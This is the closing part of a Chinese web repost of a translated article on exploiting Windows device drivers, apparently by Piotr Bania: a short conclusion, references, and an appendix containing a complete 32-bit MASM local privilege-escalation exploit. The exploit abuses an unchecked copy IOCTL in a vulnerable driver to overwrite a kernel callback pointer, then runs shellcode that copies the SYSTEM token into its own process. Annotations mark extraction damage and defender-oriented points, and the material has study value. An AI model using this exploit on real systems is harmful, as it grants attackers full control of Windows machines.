详解如何利用Windows设备驱动
2009-02-12 13:55:33 来源:WEB开发网

结束语
最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,请联系我。所有文章中涉及的程序可以在网站http://pb.specialised.info 上下载。
参考文献:
1) Win32 Device Drivers Communication Vulnerabilities
2) "Remote Windows Kernel Exploitation – Step into the Ring 0", by Barnaby Jack –
eEYE digital security – http://www.eeye.com
3) Eyas shellcode publication - ?
4) "The Windows 2000/NT Native Api Reference", by Gary Nebett
5) "Windows Syscall Shellcode", by myself -http://www.securityfocus.net/infocus/1844
6) http://pb.specialised.info
附录:exploit
;------------------------------------------------------------
; Sample local device driver exploit
; by Piotr Bania
; http://pb.specialised.info
; All rights reserved
;
; NOTE(review): all whitespace was stripped from this listing on
; extraction. Spacing between tokens is restored below; string
; literals are left exactly as they appear on the page.
; Syntax: MASM, 32-bit, Win32 API via macros from my_macro.inc.
;------------------------------------------------------------
include my_macro.inc                    ; @callx / @check / @pushsz / @debug / @get_api_addr (not on this page)

DEVICE_NAME     equ ".BUGGY"            ; NOTE(review): path separators appear to have been lost in extraction
MY_ADDRESS      equ 000110000h          ; fixed user-mode address requested from VirtualAlloc
MY_ADDRESS_SIZE equ 512h                ; some more than the 512 bytes read back through the driver

; Packet handed to the driver in every talk2device call: per the usage
; in the main body, the driver copies from dp_src to dp_dest.
D_PACKET struct
dp_dest dd 0                            ; copy destination
dp_src  dd 0                            ; copy source
D_PACKET ends
;------------------------------------------------------------
; Entry sequence (the 'start' label named by 'end start' is not
; visible on this page).
; Flow: locate the pointer that KeUserModeCallback calls through,
; open the sample device, read 512 bytes through the device into a
; user buffer, copy my_shellcode behind those bytes, then write the
; buffer back over the kernel pointer.
; Register roles: ebx = device handle, edi = user buffer
; (D_PACKET at +0, copied bytes at +8, shellcode at +512+8).
;------------------------------------------------------------
        call    find_KeUserModeCallback_Routine ; RVA of the pointer -> [KeUserModeCallback_Routine]
        call    get_ntos_base                   ; loaded kernel base -> [real_ntos_base]
        mov     eax, dword ptr [real_ntos_base]
        add     dword ptr [KeUserModeCallback_Routine], eax ; RVA + base = kernel VA of the pointer
        call    open_device
        mov     ebx, eax                        ; ebx = device handle (input of talk2device)
        push    PAGE_EXECUTE_READWRITE
        push    MEM_COMMIT
        push    MY_ADDRESS_SIZE
        push    MY_ADDRESS
        @callx  VirtualAlloc                    ; RWX user buffer the kernel pointer is later aimed at
        @check  0, "Error:cannotallocatememory!"
        mov     edi, eax
        ; first signal copies original bytes to the buffer
        mov     eax, dword ptr [KeUserModeCallback_Routine]
        mov     dword ptr [routine_addr], eax   ; patched into the shellcode's 'mov ecx, imm32'
        mov     [edi.D_PACKET.dp_src], eax      ; src  = kernel pointer
        mov     [edi.D_PACKET.dp_dest], edi
        add     [edi.D_PACKET.dp_dest], 8       ; dest = edi+8, right behind the packet
        mov     ecx, 512
        call    talk2device                     ; device copies 512 bytes kernel -> user
        ; original bytes are stored at edi+8 (in size of 512)
        ; now lets fill the shellcode
        mov     eax, [edi+8]                    ; first dword = original pointer value
        mov     dword ptr [old_routine], eax    ; patched into the shellcode's 'mov eax, imm32'
        mov     dword ptr [old_routine2], eax   ; and into its final 'push imm32'
        @callx  GetCurrentProcessId
        mov     dword ptr [my_pid], eax         ; patched into the shellcode's 'push imm32'
        push    edi
        mov     ecx, my_shellcode_size
        add     edi, 512+8                      ; shellcode is placed behind the saved bytes
        lea     esi, my_shellcode
        rep     movsb
        pop     edi
        ; make the old KeUserModeCallback_Routine point to our shellcode
        ; and exchange the source packet with destination packet
        mov     [edi+8], edi
        add     [edi+8], 512+8                  ; dword at edi+8 = address of the copied shellcode
        mov     eax, [edi.D_PACKET.dp_src]
        mov     edx, [edi.D_PACKET.dp_dest]
        mov     [edi.D_PACKET.dp_src], edx      ; src  = edi+8 (user buffer)
        mov     [edi.D_PACKET.dp_dest], eax     ; dest = kernel pointer
        mov     ecx, MY_ADDRESS_SIZE
        call    talk2device                     ; second transfer writes user -> kernel
        push    MEM_DECOMMIT
        push    MY_ADDRESS_SIZE
        push    edi
        @callx  VirtualFree
        @debug  "I'mescalated!!!", MB_ICONINFORMATION
exit:
        push    0
        @callx  ExitProcess
;------------------------------------------------------------
; Device Driver shellcode
;------------------------------------------------------------
; EPROCESS field offsets hard-coded for one Windows XP layout
; (names taken from the comments in my_shellcode). No version
; check is made anywhere in this listing.
XP_PID_OFFSET   equ 084h                ; EPROCESS.UniqueProcessId
XP_FLINK_OFFSET equ 088h                ; EPROCESS.ActiveProcessLinks.Flink
XP_TOKEN_OFFSET equ 0C8h                ; EPROCESS.Token
XP_SYS_PID      equ 04h                 ; pid of the SYSTEM process
my_shellcode proc
;------------------------------------------------------------
; Code copied into the user buffer; it runs once the kernel's
; callback pointer has been redirected to that copy.
; Steps: write the original pointer back, walk ActiveProcessLinks
; to the SYSTEM process, store its Token field into the EPROCESS
; whose pid is my_pid, then continue into the original routine.
; The 'db' + 'dd' pairs are instructions whose imm32 operand the
; main body patches before copying (old_routine, routine_addr,
; my_pid, old_routine2).
; Defender's note: the observable effect is two EPROCESS entries
; sharing one Token pointer, which is what kernel-integrity checks
; for token theft look for.
;------------------------------------------------------------
        pushad
        db      0b8h                    ; mov eax, old_routine
old_routine dd 0                        ; hardcoded
        db      0b9h                    ; mov ecx, routine_addr
routine_addr dd 0                       ; this too
        mov     [ecx], eax              ; restore old routine
        ; avoid multiple calls...
        ;-----------------------------------------
        ; start escalation procedure
        ;-----------------------------------------
        mov     eax, dword ptr fs:[124h] ; NOTE(review): presumably the current thread via the XP KPCR layout - confirm
        mov     eax, [eax+44h]          ; the thread's process (labelled EPROCESS below)
        push    eax                     ; EAX = EPROCESS
s1:     mov     eax, [eax+XP_FLINK_OFFSET] ; EAX = EPROCESS.ActiveProcessLinks.Flink
        sub     eax, XP_FLINK_OFFSET    ; EAX = EPROCESS of next process
        cmp     [eax+XP_PID_OFFSET], XP_SYS_PID ; UniqueProcessId == SYSTEM PID?
        jne     s1                      ; nope, continue search (no bound: loops until found)
        ; EAX = found EPROCESS
        mov     edi, [eax+XP_TOKEN_OFFSET] ; ptr to EPROCESS.token
        and     edi, 0fffffff8h         ; aligned by 8 (clears the low bits of the field)
        pop     eax                     ; EAX = EPROCESS
        db      68h                     ; hardcoded push
my_pid  dd 0
        pop     ebx                     ; EBX = pid to escalate
s2:
        mov     eax, [eax+XP_FLINK_OFFSET] ; EAX = EPROCESS.ActiveProcessLinks.Flink
        sub     eax, XP_FLINK_OFFSET    ; EAX = EPROCESS of next process
        cmp     [eax+XP_PID_OFFSET], ebx ; is it our PID???
        jne     s2                      ; nope, try next one
        mov     [eax+XP_TOKEN_OFFSET], edi ; party's over :)
        popad
        db      68h                     ; push old_routine
old_routine2 dd 0                       ; ret
        ret                             ; push/ret = jump to the original routine
tok_handle dd 0                         ; not referenced anywhere in this listing
my_shellcode_size equ $-offset my_shellcode ; counts everything above, tok_handle included
my_shellcode endp
;------------------------------------------------------------
; finds the KeUserModeCallback_Routine from ntoskrnl.exe
;
; Maps ntoskrnl.exe as a plain file image (no entry point run),
; scans forward from the exported KeUserModeCallback for the first
; 'call dword ptr [imm32]' (bytes FF 15) and stores the operand
; minus the image's preferred base, i.e. the RVA of the pointer the
; kernel calls through. The scan has no upper bound.
; Out:   [KeUserModeCallback_Routine] = RVA
; Regs:  all preserved (pushad/popad)
;------------------------------------------------------------
find_KeUserModeCallback_Routine proc
        pushad
        push    1                       ; DONT_RESOLVE_DLL_REFERENCES
        push    0
        @pushsz "C:windowssystem32ntoskrnl.exe" ; NOTE(review): path separators appear lost in extraction
        @callx  LoadLibraryExA
        @check  0, "Error:cannotloadlibrary"
        mov     ebx, eax                ; ebx = user-mode mapping of the kernel image
        @pushsz "KeUserModeCallback"
        push    eax
        @callx  GetProcAddress
        mov     edi, eax                ; edi = KeUserModeCallback in the mapping
        @check  0, "Error:cannotobtainKeUserModeCallbackaddress"
scan_for_call:
        inc     edi
        cmp     word ptr [edi], 015FFh  ; little-endian FF 15 = call dword ptr [imm32]
        jne     scan_for_call
        mov     eax, [edi+2]            ; eax = imm32 operand (absolute VA in the preferred image)
        mov     ecx, [ebx+3ch]          ; e_lfanew
        add     ecx, ebx                ; ecx = PE header
        mov     ecx, [ecx+34h]          ; OptionalHeader.ImageBase (preferred base)
        sub     eax, ecx                ; VA - ImageBase = RVA
        mov     dword ptr [KeUserModeCallback_Routine], eax
        popad
        ret
find_KeUserModeCallback_Routine endp
;------------------------------------------------------------
; Gets ntoskrnl.exe module base (real)
;
; Calls NtQuerySystemInformation(SystemModuleInformation) twice:
; first with a 4-byte buffer to learn the required size (expects
; 0C0000004h), then with a GlobalAlloc'd buffer, and reads smi_Base
; of the first entry - assumed here to be the kernel image.
; Out:   [real_ntos_base]
; Regs:  all preserved (pushad/popad)
; Note:  on the error path the proc ends without 'ret' and relies
;        on @check terminating the process - confirm in my_macro.inc.
;------------------------------------------------------------
get_ntos_base proc
        local   __MODULES:_MODULES      ; 'local' gives the proc an ebp frame
        pushad
        @get_api_addr "ntdll", "NtQuerySystemInformation"
        @check  0, "Error:cannotgrabNtQuerySystemInformationaddress"
        mov     ebx, eax                ; ebx = NtQuerySystemInformation
        call    a1                      ; pushes the address of 'ns' as the ReturnLength argument
ns      dd      0                       ; receives the required buffer size
a1:     push    4                       ; SystemInformationLength
        lea     ecx, [__MODULES]
        push    ecx                     ; SystemInformation
        push    SystemModuleInformation ; SystemInformationClass
        call    eax
        cmp     eax, 0c0000004h         ; size probe: only STATUS_INFO_LENGTH_MISMATCH is accepted
        jne     error_ntos
        push    dword ptr [ns]
        push    GMEM_FIXED or GMEM_ZEROINIT
        @callx  GlobalAlloc
        mov     ebp, eax                ; ebp = module list buffer (frame pointer no longer needed; popad restores it)
        push    0                       ; ReturnLength = NULL
        push    dword ptr [ns]
        push    ebp
        push    SystemModuleInformation
        call    ebx
        test    eax, eax                ; STATUS_SUCCESS?
        jnz     error_ntos
        mov     eax, dword ptr [ebp.smi_Base] ; base of the first listed module
        mov     dword ptr [real_ntos_base], eax
        push    ebp
        @callx  GlobalFree
        popad
        ret
error_ntos:
        xor     eax, eax
        @check  0, "Error:cannotexecuteNtQuerySystemInformation"
get_ntos_base endp
;------------------------------------------------------------
; Opens the device we are trying to attack
;
; CreateFileA(DEVICE_NAME, 0, 0, NULL, 3, 80h, NULL); the handle
; is written into the saved-EAX slot of the pushad frame so that
; popad returns it in eax.
; Out:   eax = device handle
; Regs:  all others preserved
;------------------------------------------------------------
open_device proc
        pushad
        push    0                       ; hTemplateFile
        push    80h                     ; dwFlagsAndAttributes (FILE_ATTRIBUTE_NORMAL)
        push    3                       ; dwCreationDisposition (OPEN_EXISTING)
        push    0                       ; lpSecurityAttributes
        push    0                       ; dwShareMode
        push    0                       ; dwDesiredAccess = 0: no read/write right is requested
        @pushsz DEVICE_NAME
        @callx  CreateFileA
        @check  -1, "Error:cannotopendevice!" ; INVALID_HANDLE_VALUE
        mov     dword ptr [esp+PUSHA_STRUCT._EAX], eax ; return value through the pushad frame
        popad
        ret
open_device endp
;------------------------------------------------------------
; Procedure that communicates with the driver
;
; ENTRY -> EDI = INPUT BUFFER (a D_PACKET)
;          ECX = INPUT BUFFER SIZE
;          EBX = DEVICE HANDLE
;
; Single IOCTL 011111111h, input only, no output buffer.
; Defender's note: from the main body's usage the driver appears to
; copy ECX bytes from dp_src to dp_dest with neither pointer
; validated (presumably no ProbeForRead/ProbeForWrite on the
; caller-supplied addresses - confirm against the driver); the
; control code above is the value a monitoring tool would key on.
; Regs:  all preserved (pushad/popad)
;------------------------------------------------------------
talk2device proc
        pushad
        push    0                       ; lpOverlapped
        push    offset bytes_ret        ; lpBytesReturned
        push    0                       ; nOutBufferSize
        push    0                       ; lpOutBuffer
        push    ecx                     ; nInBufferSize
        push    edi                     ; lpInBuffer
        push    011111111h              ; dwIoControlCode
        push    ebx                     ; hDevice
        @callx  DeviceIoControl
        @check  0, "Error:Send()failed"
        popad
        ret
bytes_ret dd 0                          ; scratch for lpBytesReturned; never read
talk2device endp
; Layout of the SystemModuleInformation buffer as used above: a
; count followed by the first module entry. Only smi_Base is read
; in this listing; the entry is assumed to describe the kernel.
_MODULES struct
dwNModules     dd 0                     ; number of entries
smi_Reserved   dd 2 dup(0)
smi_Base       dd 0                     ; load address of the module
smi_Size       dd 0
smi_Flags      dd 0
smi_Index      dw 0
smi_Unknown    dw 0
smi_LoadCount  dw 0
smi_ModuleName dw 0
smi_ImageName  db 256 dup(0)
ends

SystemModuleInformation equ 11          ; SYSTEM_INFORMATION_CLASS value passed to NtQuerySystemInformation

KeUserModeCallback_Routine dd 0         ; RVA from find_KeUserModeCallback_Routine; VA once the base is added
real_ntos_base dd 0                     ; filled by get_ntos_base
base dd 0                               ; not referenced anywhere in this listing

include debug.inc                       ; @debug / @check support (not on this page)
end start                               ; NOTE(review): 'start' is not defined on this page - presumably in an include or lost in extraction
原文作者:Piotr Bania
译者BLOG:http://hi.baidu.com/ayarei